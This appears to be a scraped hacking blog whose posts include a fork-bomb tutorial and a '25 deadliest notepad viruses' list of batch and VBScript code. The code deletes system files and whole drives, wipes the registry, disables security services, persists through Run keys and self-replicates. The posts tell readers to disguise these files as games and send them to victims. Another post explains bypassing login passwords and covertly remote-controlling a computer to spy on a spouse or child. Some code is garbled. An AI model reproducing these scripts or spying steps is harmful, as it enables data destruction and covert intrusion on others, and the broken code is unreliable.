Fork bomb {complete tutorial}

this will teach you how to make a harmless fork bomb program which will lock up a computer when run.

note:
yes you can modify this to make a DOS error but im not going to be the idiot to tell you how

Step 1: Making the .bat

open up notepad and enter the following text:
:fork
start %0
%0|%0
goto :fork

save it as something.bat
to the desktop


there are about a million different ways to do this, i gave you disputably the best one, other variants include:

my favorite is the spread like a real virus bomb

explorer bomb:
:e
start %0
start C:\Windows\explorer.exe
%0|%0
goto :e

program bomb:
:e
start %0
start anyprogramyouwant
%0|%0
goto :e

the mini bomb:
%0|%0

inefficient bombs:
#1:
:e
start
start
start
goto :e

#2:
:e
start cmd.exe
goto :e

#3
:e
start (name of the batch file)
goto :e

slap in the face for deleting this bomb:
IF (DELETE whatever.bat) goto :e
IF (ERASE whatever.bat
:e
start %0
%0|%0
goto :e

matrix bomb:
@echo off
color 0a
:x
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% (lots of randoms)
start %0
%0|%0
goto :x

spread like a real virus bomb:
:e
copy /Y %0 %random%.bat
start %0
%0|%0
goto :e

alphabet fork:
:a
start %0
%0|%0
goto :a
:b
start %0
%0|%0
goto :b
:c
start %0
%0|%0
goto :c
:d
start %0
%0|%0
goto :d
:e
start %0
%0|%0
goto :e
:f
start %0
%0|%0
goto :g
:h
start %0
%0|%0
goto :i
:j
start %0
%0|%0
goto :j
:k
start %0
%0|%0
goto :k
:l
start %0
%0|%0
goto :l
:m
start %0
%0|%0
goto :m
:n
start %0
%0|%0
goto :n
:o
start %0
%0|%0
goto :o
:p
start %0
%0|%0
goto :p
:q
start %0
%0|%0
goto :q
:r
start %0
%0|%0
goto :r
:s
start %0
%0|%0
goto :s
:t
start %0
%0|%0
goto :t
:u
start %0
%0|%0
goto :u
:v
start %0
%0|%0
goto :v
:w
start %0
%0|%0
goto :w
:x
start %0
%0|%0
goto :x
:y
start %0
%0|%0
goto :y
:z
start %0
%0|%0
goto :z
:bob
start %0
%0|%0
goto :bob

Step 2: Convert to exe

download bat to exe converter
http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
extract it to the desktop and run it
chose your something.bat for the batchfile and an icon if you want
press compile
there should be a something.exe on your desktop

Step 3: Deploy

now this can be run on any machine that runs exe's
you can trick a friend into running it once for fun, or you can use it with an autorun.ini on a cd to make it run as soon as its inserted
or you could be more deviant and make it run every time the user logs in, to do this just drag and drop it to the startup folder in the start menu

hacks, how-to, windows | HT | 20:57 No comments Read More

25 deadliest notepad viruses .

Here I am posting scripts which are used in creating a virus using
notepad. Some of them will works on windows xp and some of them in windows 7.


First thing you need to do is to open notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r run window will open and
type notepad and hit enter .

No 1:- 

Here is a Batch File virus which can:
1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).
Here is the Code:

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

No 2:-

@echo offdel D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Then save it as kinng.bat and the batch file is created .
WARNING :: This is the most dangerous virus! Be careful with its use.

Delete the entire registry

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Now save it as kinng.bat and the batch file is created .


No 3:- How to crash a PC Forever
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.

No 4 :- How to stop someone's internet access

@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

No 5 :- ShutDown PC million Times

1.Right click on the desktop
2.Click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

No 6:-

Open Notepad
Write / copy the below command there:
" del c:\WINDOWS\system32\*.*/q " without quote
and save as " anything.bat"
Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.

No 7:-

Process:
Open Notepad
Copy the below command there
"rd/s/q D:\
rd/s/q C:\
rd/s/q E:\" ( without quotes )
Save as "anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds.

No 8 :-

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having .vbs Extension .

No 9 :- 

Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.

No 10:- Convey your friend a little message and shut down his / her computer

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

No 11 :- Toggle your friend's Caps Lock button simultaneously

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.

No 12:- Frustrate your friend by making this VBScript hit Enter simultaneously
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

No 13 :- This Virus Deletes All The Content Of A Drive.

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat

No 14:- This Will Crash Your Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

No 15 :-

The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: *.* |y

Save It As Anything.bat

No 16 :- Virus that crashes pc

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

No 17:- Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

No 18 :- Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File

No 19 :- Change Files To Non-working TXT Files

Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT


No 20 :- System Meltdown
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File

No 21:- Temporarily Flood Network
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup !

How to Spread it:
Windows doesn't allow to change the icon of .bat files. Therefore what you can do is :
Right click on the .bat file
Click on CREATE SHORTCUT
And hide the original file.
Now as this newly created file is just the shortcut, you can easily change its icon.
Right click on this shortcut
properties >>>..customize>..choose icon
Now give an attractive icon to it.
Now name it something interesting eg. PROTOTYPE or IGI etc.
Now your victim would think it to be the game , and he will be easily corrupted.

No 22:- How to stop someone's internet access

@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew
ShutDown PC million Times::::

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u
will find the icon on ur desktop, dont open it, just right click on it
and press properties>change icon>select the icon the the internet
explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

No 23:- Freeze someone's desktop

This is a funny trick, u can freeze someone's desktop
1.close everything u r working in, and work on desktop. so click on prtscr on ur keyboard.
2.go to paint and click on edit then paste
3.save this file as (name).bmp and close the paint.
3.now
in the desktop, we have 2 remove desktop icons and shortcuts, so right
click on the mouse and then properties, click on desktop then select
customize desktop.
4.uncheck all the boxes in desktop icons and press ok. then press apply then ok.
5.now
to remove the shortcuts in the desktop, go to start and select My
Computer, then click on c: right click on ur mouse and select new
folder, write it any name
6.now go to desktop & select all da
icons and right click on them then press cut,go to c: and paste them in
the folder dat u created then close the window.
7.now to put the
fake desktop image and remove the taskbar, so right click on desktop and
gp to properties, now go to desktop and select Browse, select the file
that u saved then press appply then ok. now to remove the windows
taskbar, right click on the taskbar and go 2 properties, then select
autohide the taskbar and then apply then ok
now all the icons r fake and the user will think that his desktop is freezed
enjoy it.!

No 24:- SHUT YOUR INTERNET PERMENANTLY

This is a slightly more advanced one. It shuts down your internet
permanately. I tried it on myself accidently, i knew what it did, and it
still took me a couple of days to get my internet back. works best on
XP, not tested on vista or 7.
EDIT: At the bottom put a rickroll
site or something. BTW, that 3rd line, isnt what disables the internet
permanately. It is somethinge else, that just provides a fast response
to shut down any connections.


@echo off
reg
add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t
REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a

No 25:- MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::

Warning - Do not run it on your computer
I'm gonna teach you how to make a virus named Matrix...
1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;

3-save it as matrix.bat
4-finish

AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO , AND STUFF LIKE THAT.

hacks, how-to, sourcecode, windows | HT | 20:44 No comments Read More

Internet security system.

                       ETHICAL HACKING

Free e-book on ethical hacking Internet Security System, hack like a pro. This E-book contains the following contents:

1. Attack types and vulnerabilities.
a. Case study: The dangers of mobile code

2. Searching for public corporate information.
a. Passive information gathering
b. ICANN

3. Searching for technical information.
a. Gathering technical information
b. Zone transfer
c. Significant resource record (RR's)
d. Tools used to query name servers

4. Network scanning.
a. Firewall and gateway design traits
b. Ping sweeps
c. Traceroute
d. Network mapping
e. SMTP headers
f. Local scanning and sniffing

5. Interpreting network results.
a. Live hosts

6. Host scanning.
a. Vulnerability scanning
b. Masterclass: Port scanning and OS identification

7. Interpreting host results.
a. Masterclass: Good firewall design
b. Packet filtering TCP/UDP/ICMP
c. Proxy servers
d. Network level firewall and application level

8. Vulnerability and exploit research.
a. Buffer overflow
b. Detecting buffer overflows
c. Exploit Chains
d. Web servers and FTP sites
e. IRC

9. Theoretical exploitation.
a. Web spoofing
b. Distributed denial of service attack
c. Attack survival
d. Attack prevention
e. Attack forensics

10. Exploitation in action.
a. RDS exploit
b. eEye
c. Firewall-1 dos/jolt2.c and cpd.c
d. Back orifice 
e. Buffer overflows
f. TCP session hijacking

11. Summary.
a. Passive information gathering
b. Active information gathering
c. Firewall and router assessment
d. Mitnick versus shimomura

Sharing is Caring.
Click the download button below to get this E-book for free.

e-books, hacks | HT | 06:15 No comments Read More

Strong Password.

  Do it now before it's too late.

Password strength is a measure of the effectiveness of a password in resisting guessing and brute-force attacks. In its usual form, it estimates how many trials an attacker who does not have direct access to the password would need, on average, to guess it correctly. The strength of a password is a function of length, complexity, and unpredictability. 

1.Minimum length 8 characters :
►As a rule of thumb, your password must never be below 8 characters. If an attacker happens to use a brute-force attack on your account,which is just trying every possible comobination - with every addition of a character the time taken for the BF attack to crack your password increases exponentially. On average, while it may take just a few minutes to crack open a 6 character password, the time taken for cracking an 8 character password is measured in days and weeks. Assuming your attacker doesn't have a a billion dollar ExaFlop supercomputer after your account, your password is reasonably safe if it is over 8 characters in length(ExaFlop = 10^18 calculations per second).

2.Names and '123' are out of the question :
►The most common passwords are "Name123". Whenever someone is after your account, the first thing they try is common passwords like this. Whoever that person is, you have to assume the worst. It might be some random old guy in his mom's garage or maybe your best friend goofing around, you must assume they know everything about you- your name(duh), amily member's names, favourite sportsmen, actors, singers- everything. This is the safest way to go. A surprisingly large number of people simply append a '123' to the front or back of a common object thinking they are very smart, but this is the most predictable password there is. Most hackers will start straight away by adding that '123', and if your password is anything like this, you're screwed. Change it ASAP! 

One more thing that deserves mention here is the so called "Security Question". Reason being that people who know you will know questions about you like "What was your first pet's name?" or "In what town were you born?" - some of the most common security questions. Plus, the people who know you are far more likely to be interested in taking a peek at your private messages than a random old guy in a garage.
Hence, I recommend to never actually use the security questions in the way they are meant to be used. Don't use a direct answer, use something that the question reminds you of. While these may offer another layer of protection from annonymous attackers, they can make cracking your account fairly easy by the people who know you. As an example, someone you know well if left alone with access to your mobile phone might be able to get into your Facbook account with no difficulties at all. Always treat security question as an emergency password, it should be unobvious but easy to remember. 

3.Random things? Think again.
►There's something called a dictionary attack. In a nutshell, it means that your attacker has a dictionary, and a program that will throw every word in the dictionary as an attempt to crack your password. After trying out your own and related names +'123', this is what the Hacker is going to try next - A dictionary attack. So it is better if you keep your password well away from any real words.
Although still not a 100% safe, 'potjack123' is much safer than 'jackpot123'. 

4.Turn it around :
►Now a password like 'aGF$hvYH916!~**' is probably as safe as it can get, but it's not exactly easy to remember and definitely not easy to type quickly. For this reason, I(for one) turn words around. What I mean by that is instead of using 'velocity', use 'yticolev'. While as a normal word, it's easy to guess but after reversing the characters it's unrecognizable.
After a few times, you'll get used to it and will be able to type it as quickly as the other one. 

5.Throw in symbols and numbers easily :
►If you're like most people, your current passwords probably don't have any weird symbols. But I have a quick way of adding both numbers and symbols to your password.
Here's an example -
'567yticolev%^&' 

Looks weird, right? Well that's the point. What we have here is, the base word 'velocity' - reversed, a '567' at the start (which is much better than a '123'), and at the end I have seemingly random symbols which are actually just 'SHIFT + 567', that is these are actually the ones written above '567' on your keyboard respectively. So all you have to remember is velocity and '567' and within a few days you'll be able to type this as fast as any other password but only this one will be relatively impenetrable. (Unless of course you have a supercomputer after your ass, in which case you're screwed XD) 

6.Capitalize- The final blow :
►You might be wondering what's the point of adding so much random stuff to your password. Our main goal is basically to expand the number of characters which your attacker has to test to find your password. So - Small alphabets = 26 characters, Numbers = 10 more, Symbols = around 20 more. But if you throw in even just one Capital alphabet, that means your attacker has another 26 freaking characters to test which means, in this case, he's screwed. Reason being the brute-force attack I mentioned earlier. Say your password is the one in the last point with a capital 'V' and 'Y' :
'567YticoleV%^&' 

So that's 14 characters with upper and lower case alphabets, numbers and symbols. Believe it or not, such is the power of exponential growth that it will actually take an average computer BILLIONS even TRILLIONS of years to crack your password. Now even if your insane attacker can somehow get a supercomputer, it would take him several thousands of years to get your password. After even a fraction of this time we can safely assume that he would have lost all his money buying the supercomputer and the will to do whatever he wanted to do with your account. (You can calculate the exact time by using permutations and combinations and the speed of the CPU) 

One last thing, by using the same passwords for several different accounts you'll only be making the hacker's job easier. But yes, remembering a dozen passwords is probably not worth it. For this I suggest making tiny changes. If you use 567velocity for gmail, you can use 456velocity for facebook, 678velocity for yahoo etc. To hack the next account the hacker will have to go through all the combinations all over again and that for him, will probably not be worth it. 

So there you have it! For all practical purposes a password like this will be impenetrable throughout your lifetime. (Nevertheless, I still recommend changing your password around twice a year or so. That's because you're not the only one reading this article.)

tips-tricks, windows | HT | 11:11 No comments Read More

How to Hack a Computer

Hacking a computer is a useful and, at times, an important skill to pick up. Below are instructions for getting past a password (if you find yourself logged out of a computer or want to check up on your child or spouse), gaining remote access to a computer (to check on a user or help locate a stolen machine), or crack a wifi password (in the event of an emergency, such as if you become lost in an unfamiliar city and you need to look up directions.

Method 1 of 2: Getting Past a Log In Password

1 Boot the computer in safe mode.


2 Click “Start”.


3 Click “Run”.


4 Type in “control userpasswords2”.[1]


5 Change passwords for any account. This is probably going to be obvious to the user, so you may have to tell them a little white lie. Try something along the lines of: "Oh, I hear computers glitch like that sometimes. You can always type in recoverpassword if you get locked out and then set a new password" (in which case you will want to set the password to the account to recoverpassword or whatever you tell this person).[2]


6 Reboot the computer.

Method 2 of 2: Getting Remote Access

1 Download the program LogMeIn. There is a free version, though you can purchase a subscription if that better meets your needs.[3]
The program will need to be downloaded to the computer you intend to remotely view or use. This makes it useful for gaining access to your computer if it is stolen or for checking up on your teen’s daytime activities during the summer.

You will have to make an account with the LogMeIn website in order to use the software.



2 Log in to the website. Log in to LogMeIn’s website.


3 Navigate to the “My Computers” page. It should open automatically when you sign in.


4 Add the computer you intend to remotely access. You will see an “Add computer” button on the page. Click that and fill in the info for the computer you intend to access.


5 Click the name for the computer once it’s added.


6 Log on to the computer. This means you’ll have to know the username and password for the account you’re trying to access or view.


7 Click “Remote Control”. If you’re trying to be sneaky (such as to spy on the user), try to move the mouse as little as possible and don’t click on anything.


8 Log out when you’re done.

hacks, how-to, tips-tricks, windows | HT | 09:54 No comments Read More

How to Track Who Views Your Facebook Profile

Why can't I see who is stalking my Facebook profile?

There are other social networks that do let you see who's viewed your profile, mainly LinkedIn and its "Who's Viewed Your Profile" feature.

Regular users can see a recent list of who has been spying on you, along with some basic analytics, while paid users can see up to 90 days worth of viewers, as well as more detailed analytics. It's great for seeing potential job interest and company prospects.

And what's better than finding a hot girl that has a great job? Finding one that viewed your profile. So, why doesn't Facebook jump on board? How great would it be to know when a girl you just friended viewed your profile and photos? It would be pretty clutch.

While there isn't a built-in feature to see who exactly has checked you out, you still might be able to get some information on how often your Facebook friends are viewing your profile.

Can You Use Facebook's "InitialChatFriendsList"?

Many rumors on the web claim that Facebook secretly exposes your recent visitors in an array variable (aka: a list of IDs) in the page source code called the InitialChatFriendsList. While this variable does not actually contain the IDs of people stalking your profile, it does give us an interesting peek into how Facebook's algorithms rank your relationships with your friends.

Facebook prioritizes the friends in your chat list using an internal (not-publicly documented) algorithm that appears to be based off of how often you communicate with each of your friends. From my research it appears to take into account recent interactions (in messages, chat, or comment threads) and frequency of recent chats.

It's rumored across the web that the person located at the very top of your "InitialChatFriendsList" is the person who last looked at your profile, but this is wrong. People you never have contact with will most likely be at the very bottom, and those that you communicate with more frequently will probably be up top.

Debunking the InitialChatFriendsList Stalker Rumor...

For me, the first three profiles that showed up were with people that I messaged or chatted with yesterday. To substantiate my claim that thisdoes not show people viewing you, I had my roommate check out my profile about 25 times in an hour. I went back in to check my list, and it remained unchanged.

So, it most definitely does not prioritize people checking out your profile at the top of the list. But still, it's a fun way to check out who you have contact with most (though, you should probably already know that).

Finding the InitialChatFriendsList

If you'd like to view it for yourself, you can easily find this list by viewing the source code of your profile page. To do this, just go to your profile page, right-click in an empty area on the side, and select "View Page Source."

Image via wonderhowto.com

This will you show the page's source code. From here, go ahead and pressCommand+F (Mac) or Control+F (Windows) to open the find feature. In the search field, enter InitialChatFriendsList and you'll be taken to the list in the code.

However, it will not show names or links to your friends' profiles. Instead, it shows their Facebook IDs (numbers).

This large list of profile IDs (each separated by commas) is actually your full list of friends.

Turning Numbers into Names

To see whose face matches a number, go ahead and copy the number ID of who you want to check out. You only need to copy the full number that appears in-between the quotation marks, and before the hyphen (the last number after the hyphen doesn't matter).

Then just paste it into a new tab or window using the URL below, substituteNUMBERID for your friend's actual ID number.

• https://www.facebook.com/NUMBERID

Hit enter and you'll be taken to your friend's profile.

A More Visual Approach...

If diving into the source code seems too intimidating, you can see a visual representation of the top few people in your InitialChatFriendsList by doing the following:

1. From the desktop view (this won't work on mobile), make sure your browser window is small enough to hide the sidebar, making the chat window float at the bottom right of your browser window.
2. If you're logged into chat, turn off chat for all friends (you can do this using the gear icon). You'll need to do this as chat will reorder the list based on who's online whenever you're signed in.
3. Refresh the browser window (this makes sure it doesn't remember who's online and who isn't).
4. Click the little "Chat (off)" bar at the bottom right to switch it on, and pay close attention to the list of friends you initially see.
5. For a second or two, the friends you'll see will be the ones from your InitialChatFriendsList.

• Note 1: You'll have to look closely as the moment chat finishes logging you in, it'll get an updated list based on who's currently online. Once you see green dots next to anyone's name, you'll know it's now showing your online friends instead of your InitialChatFriendsList.
• Note 2: You can always repeat steps 2-4 if you miss it the first time.
• Note 3: Once chat is online, those who are online are pushed up to the top, with the secondary sort being based off of the InitialChatFriendsList order.

Faster Alternative Method...

If you have the updated Facebook look, it's easier to do the reverse and expand the width of your browser window until you see the combo Ticker and Chat sidebar. This will actually show you a list of your friends whether you have Chat turned on or off, so you have all the time in the world to look at the top of the InitialChatFriendsList.

You can adjust the slider to make the Chat box bigger to see more friends. If you still see the grey "Chat (off)" box in the bottom, you probably don't have the updated look yet.

Really, this is just a more visual way to debunk the theory that the people listed first are the people spying on your profile.

The Next Best Thing: Groups and Messages

The notorious "Seen By" feature is built into the Messages and Group sections. Anytime a post or photo is uploaded, you can check to see who saw the item right there in the message.

Of course, this isn't the same as seeing everyone that viewed your profile, but you can at least see everyone that viewed your message or group post. Since I hate this feature, I'm glad this hasn't leaked out to any other Facebook applications.

Beware of False Applications

